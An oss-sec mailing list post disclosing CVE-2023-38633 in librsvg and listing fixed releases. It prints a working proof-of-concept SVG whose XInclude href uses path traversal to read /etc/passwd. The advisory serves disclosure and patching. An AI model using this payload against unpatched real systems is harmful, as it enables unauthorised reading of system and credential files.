oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

CVE-2023-38633 in librsvg: Arbitrary file read when xinclude href has special characters

From: Alan Coopersmith <alan.coopersmith () oracle com>
Date: Thu, 27 Jul 2023 13:36:17 -0700
I haven't seen this go by yet, so for those who haven't seen it:

https://gitlab.gnome.org/GNOME/librsvg/-/issues/996 reports:

CVE-2023-38633: Arbitrary file read when xinclude href has special characters

This was reported by Zac Sims.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude";>
  <rect width="300" height="300" style="fill:rgb(255,255,255);" />
  <text x="10" y="100">
<xi:include href=".?../../../../../../../../../../etc/passwd" parse="text" encoding="UTF-8"> 
      <xi:fallback>file not found</xi:fallback>
    </xi:include>
  </text>
</svg>
This ends up actually including the contents of /etc/passwd, bypassing the checks in UrlResolver::resolve_href().
The above linked bug report provides further analysis and links to merge requests for the fixes. Fixes have been published in new releases of 
librsvg for many release trains:

    2.56.3
    2.55.3
    2.54.6
    2.52.10
    2.50.8
    2.48.11
    2.46.6

--
        -Alan Coopersmith-                 alan.coopersmith () oracle com
         Oracle Solaris Engineering - https://blogs.oracle.com/solaris
Previous By Date Next
Previous By Thread Next

Current thread: